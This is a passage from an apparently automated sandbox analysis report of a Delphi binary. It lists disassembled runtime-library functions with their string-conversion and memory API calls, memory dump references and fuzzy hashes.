                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002782B,?,?,?,?,?,500156A4,00000000,500156E2), ref: 500277D2
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002782B,?,?,?,?,?,500156A4,00000000,500156E2), ref: 500277F8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AnsiFromStr$qqrr20StringStringx27System@System@%System@@T$us$i0$%Unicode$Internal
                                                                                                  • String ID:
                                                                                                  • API String ID: 2707610650-0
                                                                                                  • Opcode ID: e7a70c3558bd8af8c47607f7dc99d6952102971f24995eeed80e251423e86636
                                                                                                  • Instruction ID: 200609d8e3b54832c1637fbc2b58139f495729bdf34ff5c0e14a03cdfe71e056
                                                                                                  • Opcode Fuzzy Hash: e7a70c3558bd8af8c47607f7dc99d6952102971f24995eeed80e251423e86636
                                                                                                  • Instruction Fuzzy Hash: 1F31D730A06187EF9F11DFB8EB169BEB3F6EF402007A086A5D508D7155EB70DE42D681
                                                                                                  Function 50029CF0 Relevance: 9.1, APIs: 6, Instructions: 91COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@PCharLen$qqrpc.RTL120(?,?,00000000,?,5002A1CB), ref: 50029C6A
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,5002A1CB), ref: 50029C7E
                                                                                                  • @System@@GetMem$qqri.RTL120(0000FDE9,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,5002A1CB), ref: 50029C91
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000000,?,00000000,0000FDE9,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?), ref: 50029CA7
                                                                                                  • CharUpperBuffW.USER32(?,00000000,0000FDE9,00000000,00000000,00000000,?,00000000,0000FDE9,00000000,00000000,00000000,00000000,00000000), ref: 50029CAE
                                                                                                  • @System@@FreeMem$qqrpv.RTL120(?,00000000,0000FDE9,00000000,00000000,00000000,?,00000000,0000FDE9,00000000,00000000,00000000,00000000,00000000), ref: 50029CDD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Char$System@@$ByteMultiWide$BuffFreeLen$qqrpcMem$qqriMem$qqrpvUpper
                                                                                                  • String ID:
                                                                                                  • API String ID: 1645325746-0
                                                                                                  • Opcode ID: 21fe9afe1a4d83a0676da24a77eaaefb3b218fec0eebcba249eb9c961a3e5a99
                                                                                                  • Instruction ID: f7199de9386b15250c3ec5562f9d3cd908530842460295cde10b401094cd2a77
                                                                                                  • Opcode Fuzzy Hash: 21fe9afe1a4d83a0676da24a77eaaefb3b218fec0eebcba249eb9c961a3e5a99
                                                                                                  • Instruction Fuzzy Hash: C51129127832D62BFB302079BC92BFB66C9C7422A0FE50336F644D72C1D8444C0162E4
                                                                                                  Function 5000B08C Relevance: 9.1, APIs: 6, Instructions: 87COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@LStrAddRef$qqrpv.RTL120(?,?,?,5000B069), ref: 5000B0D3
                                                                                                  • @System@@WStrAddRef$qqrr17System@WideString.RTL120(?,?,?,5000B069), ref: 5000B0E2
                                                                                                  • @System@@AddRefArray$qqrv.RTL120(?,?,?,?,5000B069), ref: 5000B10E
                                                                                                  • @System@@AddRefRecord$qqrv.RTL120(?,?,?,?,5000B069), ref: 5000B124
                                                                                                  • @System@@IntfAddRef$qqrx45System@%DelphiInterface$t17System@IInterface%.RTL120(?,?,?,5000B069), ref: 5000B134
                                                                                                  • @System@@DynArrayAddRef$qqrv.RTL120(?,?,?,5000B069), ref: 5000B143
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$System@$ArrayArray$qqrvDelphiInterface$t17Interface%IntfRecord$qqrvRef$qqrpvRef$qqrr17Ref$qqrvRef$qqrx45StringSystem@%Wide
                                                                                                  • String ID:
                                                                                                  • API String ID: 2012329709-0
                                                                                                  • Opcode ID: f4ec387a1cd11effdb45d4b7d2cd1ee05245cfe1110f8ce66fbe9255a9397f64
                                                                                                  • Instruction ID: 6d55af36f0b63116c874578287824143ce439da2b530ab690ffda4e0f3d9c361
                                                                                                  • Opcode Fuzzy Hash: f4ec387a1cd11effdb45d4b7d2cd1ee05245cfe1110f8ce66fbe9255a9397f64
                                                                                                  • Instruction Fuzzy Hash: 2921A431284EC447F621B74CECB2BE7B3D1EB663143D04B26E9918B219D664AC4396A5
                                                                                                  Function 5000925C Relevance: 9.1, APIs: 6, Instructions: 66COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,?,?,?,?,50008CA1,?,?,?,500056AE,00000000), ref: 50009281
                                                                                                  • @System@@ReallocMem$qqrrpvi.RTL120(?,?,?,?,?,50008CA1,?,?,?,500056AE,00000000), ref: 5000929E
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(00000000,?,?,?,?,50008CA1,?,?,?,500056AE,00000000), ref: 500092B7
                                                                                                  • @System@@NewAnsiString$qqrius.RTL120(?,?,?,?,50008CA1,?,?,?,500056AE,00000000), ref: 500092C8
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(?,?,?,?,50008CA1,?,?,?,500056AE,00000000), ref: 500092E0
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(?,?,?,?,50008CA1,?,?,?,500056AE,00000000), ref: 500092E7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$AnsiClr$qqrpvSystem@$FromMem$qqrrpviMove$qqrpxvpviReallocStr$qqrr27StringString$qqriusStringusSystem@%T$us$i0$%x20Unicode
                                                                                                  • String ID:
                                                                                                  • API String ID: 2700304443-0
                                                                                                  • Opcode ID: 8ea68c66dfcedd19741d309cb17a95da812b4b11250355e603ccff5346edb9f3
                                                                                                  • Instruction ID: 19fd1448c94dc337e7dea5b0d8d868d31cbff661868f48eb09bfe7f6c9d98fa6
                                                                                                  • Opcode Fuzzy Hash: 8ea68c66dfcedd19741d309cb17a95da812b4b11250355e603ccff5346edb9f3
                                                                                                  • Instruction Fuzzy Hash: BB1108317016905BFF459A5D9CA4B1EF3EAAFE16017E4427AE504CB369DEB0CC01C396
                                                                                                  Function 50024778 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002482B), ref: 500247B6
                                                                                                  • @Sysutils@NextCharIndex$qqrx20System@UnicodeStringi.RTL120(00000000,5002482B), ref: 500247E6
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,5002482B), ref: 500247F4
                                                                                                    • Part of subcall function 500089A4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(50006B15,00000000,50006B69), ref: 500089B7
                                                                                                  • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,5002482B), ref: 500247F9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Unicode$System@$StringSystem@@$AnsiFromInternalStr$qqrr20Stringx27System@%T$us$i0$%$CharEnsureIndex$qqrx20Len$qqrx20NextString$qqrr20StringiSysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 3710370719-0
                                                                                                  • Opcode ID: 8b75fbade8f57a9a3d3cff76574fc1a2f37bac70cd31005b4f4dbd189082e660
                                                                                                  • Instruction ID: c71702f12b748d452bae67db58d8c73811d6ffb118b8ba3891e4b339e8c778a6
                                                                                                  • Opcode Fuzzy Hash: 8b75fbade8f57a9a3d3cff76574fc1a2f37bac70cd31005b4f4dbd189082e660
                                                                                                  • Instruction Fuzzy Hash: ED21E43091A0DAEFDB91DBA8E8525ADB3F4EF06710B6107A2ED10D7261D3705E01E792
                                                                                                  Function 5000A0CC Relevance: 9.1, APIs: 6, Instructions: 64COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A0EC
                                                                                                  • @System@@ReallocMem$qqrrpvi.RTL120(?,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A10D
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A128
                                                                                                  • @System@@NewUnicodeString$qqri.RTL120(00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A137
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A151
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A158
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$Clr$qqrpvSystem@Unicode$AnsiFromMem$qqrrpviMove$qqrpxvpviReallocStr$qqrr20StringString$qqriStringx27System@%T$us$i0$%
                                                                                                  • String ID:
                                                                                                  • API String ID: 459293572-0
                                                                                                  • Opcode ID: 4cc0a279c1e311adab8d615449bc2667f6091f2205e3147081700d59042c7b26
                                                                                                  • Instruction ID: abed3fd4436abaaa380d7623d8e1add1c8c2b5ba31a90049ac681112dc4d52f4
                                                                                                  • Opcode Fuzzy Hash: 4cc0a279c1e311adab8d615449bc2667f6091f2205e3147081700d59042c7b26
                                                                                                  • Instruction Fuzzy Hash: 6A11E5327035704FBB049B6D9865799B3EAAFE6511BE48276E104CF31AEA70CC018381
                                                                                                  Function 5002E44C Relevance: 9.1, APIs: 6, Instructions: 59COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@LStrAddRef$qqrpv.RTL120 ref: 5002E45A
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5002E4EB), ref: 5002E487
                                                                                                    • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                  • @System@@DynArraySetLength$qqrv.RTL120(?,00000000,5002E4EB), ref: 5002E4A5
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 5002E4C7
                                                                                                  • @System@Move$qqrpxvpvi.RTL120 ref: 5002E4D0
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(5002E4F2), ref: 5002E4E5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$System@$AnsiFromStr$qqrr27StringStringusSystem@%T$us$i0$%x20Unicode$Internal$ArrayClr$qqrpvLength$qqrvMove$qqrpxvpviRef$qqrpv
                                                                                                  • String ID:
                                                                                                  • API String ID: 1261208877-0
                                                                                                  • Opcode ID: 4549fb7da4154c2efe271ba38f2e99dccb4cd4c1b1852a6d14b1631e81dae761
                                                                                                  • Instruction ID: 3c343618ad32febf82e58c60c3e9db0a7bab7a8f9f77b7682e2089b40a4c880e
                                                                                                  • Opcode Fuzzy Hash: 4549fb7da4154c2efe271ba38f2e99dccb4cd4c1b1852a6d14b1631e81dae761
                                                                                                  • Instruction Fuzzy Hash: 53119E30702186EFEB14EFB8ED619AEB3F9EB48200BA04276E505D3651E674EE41C695
                                                                                                  Function 5001C64C Relevance: 9.1, APIs: 6, Instructions: 58COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Sysutils@LastDelimiter$qqrx20System@UnicodeStringt1.RTL120(00000000,5001C6EA), ref: 5001C675
                                                                                                    • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C430
                                                                                                    • Part of subcall function 5001C3F4: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C442
                                                                                                    • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C466
                                                                                                    • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C48D
                                                                                                    • Part of subcall function 5001C3F4: @Sysutils@StrScan$qqrpxbb.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C49C
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C6EA), ref: 5001C699
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @Sysutils@IsDelimiter$qqrx20System@UnicodeStringt1i.RTL120(00000000,5001C6EA), ref: 5001C6BA
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001C6EA), ref: 5001C6CF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$System@@$String$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Sysutils@$Delimiter$qqrx20$Char$qqrx20Copy$qqrx20LastScan$qqrpxbbStringiiStringt1Stringt1i
                                                                                                  • String ID:
                                                                                                  • API String ID: 3602360137-0
                                                                                                  • Opcode ID: b7ecdf829e09be1f06fca1847c704ca9ba1f4837353794b0604a6312a969fd8d
                                                                                                  • Instruction ID: b57de0521b8727ab11f2a8e42c2c38b0e85b4303b6796bbee391bef3ecd85a0b
                                                                                                  • Opcode Fuzzy Hash: b7ecdf829e09be1f06fca1847c704ca9ba1f4837353794b0604a6312a969fd8d
                                                                                                  • Instruction Fuzzy Hash: 8E11A534611188EFDF04DFE8DD52DAD73F8EF99214B6056A6E400D3251DB74DE81D650
                                                                                                  Function 5002D8E4 Relevance: 9.1, APIs: 6, Instructions: 56COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Sysutils@TEncoding@GetByteCount$qqrx20System@UnicodeString.RTL120(00000000,5002D979), ref: 5002D90D
                                                                                                    • Part of subcall function 5002D5A8: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002D61B), ref: 5002D5E1
                                                                                                    • Part of subcall function 5002D5A8: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5002D61B), ref: 5002D5F4
                                                                                                  • @System@@DynArraySetLength$qqrv.RTL120(00000000,00000000,5002D979), ref: 5002D922
                                                                                                    • Part of subcall function 5000C0F4: @System@DynArraySetLength$qqrrpvpvipi.RTL120 ref: 5000C0F9
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120 ref: 5002D942
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @Sysutils@TEncoding@GetBytes$qqrx20System@UnicodeStringiir25System@%DynamicArray$tuc%i.RTL120(00000000,?,?), ref: 5002D95E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$StringSystem@@$System@%$AnsiFromStr$qqrr20Stringx27T$us$i0$%$ArrayEncoding@InternalSysutils@$Array$tuc%iByteBytes$qqrx20Char$qqrx20Count$qqrx20DynamicLength$qqrrpvpvipiLength$qqrvStringiir25
                                                                                                  • String ID:
                                                                                                  • API String ID: 3882313379-0
                                                                                                  • Opcode ID: 5b6da02c156a95da7720609a9d09f4bca19e112c761973def9f4e2993511ee2f
                                                                                                  • Instruction ID: dc75beec895b85c51d3ff593ca8a9eb71013acc5c9df5cc455d5a5b56faa4565
                                                                                                  • Opcode Fuzzy Hash: 5b6da02c156a95da7720609a9d09f4bca19e112c761973def9f4e2993511ee2f
                                                                                                  • Instruction Fuzzy Hash: C311AD70701589AFEB00CBA9ED52A6AB7FDDF89700FA0427AF904D3251D671EE42D690
                                                                                                  Function 5000A9E0 Relevance: 9.1, APIs: 6, Instructions: 55COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000AA77), ref: 5000AA22
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5000AA77), ref: 5000AA46
                                                                                                  • @System@@WriteLString$qqrr15System@TTextRecx27System@%AnsiStringT$us$i0$%i.RTL120(00000000,5000AA77), ref: 5000AA52
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(5000AA7E), ref: 5000AA69
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
